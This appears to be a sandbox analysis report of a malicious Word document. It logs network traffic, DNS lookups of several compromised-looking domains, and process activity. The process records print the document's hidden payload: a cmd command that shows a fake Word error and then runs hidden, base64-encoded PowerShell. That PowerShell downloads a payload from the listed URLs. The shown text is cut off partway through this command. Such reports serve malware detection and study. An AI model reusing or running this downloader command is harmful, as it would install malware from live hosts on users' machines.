                                                                      Jan 27, 2021 12:17:37.264085054 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.515511990 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519325018 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519368887 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519397974 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.519511938 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.532542944 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:37.786819935 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:37.998981953 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:39.505713940 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:39.758045912 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:39.761086941 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:39.984756947 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.014055014 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:40.014097929 CET44349167177.12.170.95192.168.2.22
                                                                      Jan 27, 2021 12:17:40.014251947 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:40.014307022 CET49167443192.168.2.22177.12.170.95
                                                                      Jan 27, 2021 12:17:40.193675995 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.197443962 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.198034048 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.404860020 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.404910088 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.404938936 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.404967070 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.405049086 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.412507057 CET49170443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.413486004 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.615835905 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.616157055 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.617010117 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.619255066 CET44349170104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819360018 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819415092 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819436073 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819464922 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:40.819740057 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:40.822115898 CET8049165191.6.196.95192.168.2.22
                                                                      Jan 27, 2021 12:17:40.822310925 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:40.823407888 CET49171443192.168.2.22104.168.154.203
                                                                      Jan 27, 2021 12:17:41.015614033 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.025521040 CET44349171104.168.154.203192.168.2.22
                                                                      Jan 27, 2021 12:17:41.167398930 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.167530060 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.168284893 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.321968079 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322031021 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322047949 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.322351933 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.324588060 CET49172443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.325530052 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.476396084 CET4434917235.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.478358030 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.478549957 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.479553938 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.521337986 CET804916675.103.81.81192.168.2.22
                                                                      Jan 27, 2021 12:17:41.521637917 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:41.632101059 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632145882 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632209063 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.632340908 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.636425972 CET49173443192.168.2.2235.209.96.32
                                                                      Jan 27, 2021 12:17:41.728960991 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:41.788908958 CET4434917335.209.96.32192.168.2.22
                                                                      Jan 27, 2021 12:17:41.930414915 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:41.930558920 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:41.931462049 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.132985115 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133199930 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133224010 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133238077 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133246899 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.133414984 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.134701967 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.134721994 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.134824038 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.150039911 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.421269894 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.454632044 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:42.725614071 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725673914 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725712061 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725749969 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:42.725789070 CET4434917435.163.191.195192.168.2.22

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 27, 2021 12:17:34.783607006 CET5219753192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:35.270771980 CET53521978.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:35.839396954 CET5309953192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:36.146183968 CET53530998.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:36.524178982 CET5283853192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:36.995876074 CET53528388.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.050385952 CET6120053192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.098505974 CET53612008.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.105164051 CET4954853192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.153475046 CET53495488.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.695741892 CET5562753192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.756236076 CET53556278.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.759830952 CET5600953192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.816346884 CET53560098.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:39.773932934 CET6186553192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:39.983139992 CET53618658.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:40.848473072 CET5517153192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:41.014501095 CET53551718.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:41.667201042 CET5249653192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:41.727834940 CET53524968.8.8.8192.168.2.22

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jan 27, 2021 12:17:34.783607006 CET192.168.2.228.8.8.80x82b3Standard query (0)riandutra.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:35.839396954 CET192.168.2.228.8.8.80xe9daStandard query (0)calledtochange.orgA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:36.524178982 CET192.168.2.228.8.8.80xfc39Standard query (0)mrveggy.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:39.773932934 CET192.168.2.228.8.8.80x21e1Standard query (0)norailya.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:40.848473072 CET192.168.2.228.8.8.80x9f83Standard query (0)hbprivileged.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:41.667201042 CET192.168.2.228.8.8.80x868Standard query (0)ummahstars.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jan 27, 2021 12:17:35.270771980 CET8.8.8.8192.168.2.220x82b3No error (0)riandutra.com191.6.196.95A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:36.146183968 CET8.8.8.8192.168.2.220xe9daNo error (0)calledtochange.org75.103.81.81A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:36.995876074 CET8.8.8.8192.168.2.220xfc39No error (0)mrveggy.com177.12.170.95A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:39.983139992 CET8.8.8.8192.168.2.220x21e1No error (0)norailya.com104.168.154.203A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:41.014501095 CET8.8.8.8192.168.2.220x9f83No error (0)hbprivileged.com35.209.96.32A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:41.727834940 CET8.8.8.8192.168.2.220x868No error (0)ummahstars.com35.163.191.195A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • riandutra.com
                                                                      • calledtochange.org

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.2249165191.6.196.9580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 27, 2021 12:17:35.541695118 CET0OUTGET /email/AfhE8z0/ HTTP/1.1
                                                                      Host: riandutra.com
                                                                      Connection: Keep-Alive
                                                                      Jan 27, 2021 12:17:35.820429087 CET1INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 27 Jan 2021 11:17:35 GMT
                                                                      Server: Apache
                                                                      Content-Length: 404
                                                                      Keep-Alive: timeout=5, max=500
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 65 6d 61 69 6c 2f 41 66 68 45 38 7a 30 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /email/AfhE8z0/on this server.<br />Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.224916675.103.81.8180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 27, 2021 12:17:36.329037905 CET1OUTGET /CalledtoChange/8huSOd/ HTTP/1.1
                                                                      Host: calledtochange.org
                                                                      Connection: Keep-Alive
                                                                      Jan 27, 2021 12:17:36.515872955 CET2INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Jan 2021 11:17:36 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      HTTPS Packets

                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                      Jan 27, 2021 12:17:37.519368887 CET177.12.170.95443192.168.2.2249167CN=mrveggy.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Jan 11 02:13:40 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun Apr 11 03:13:40 CEST 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                      Jan 27, 2021 12:17:42.134701967 CET35.163.191.195443192.168.2.2249174CN=www.ummahstars.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USFri Mar 20 12:52:22 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Thu May 19 22:40:05 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:12:17:33
                                                                      Start date:27/01/2021
                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                      Imagebase:0x13f890000
                                                                      File size:1424032 bytes
                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:17:35
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgB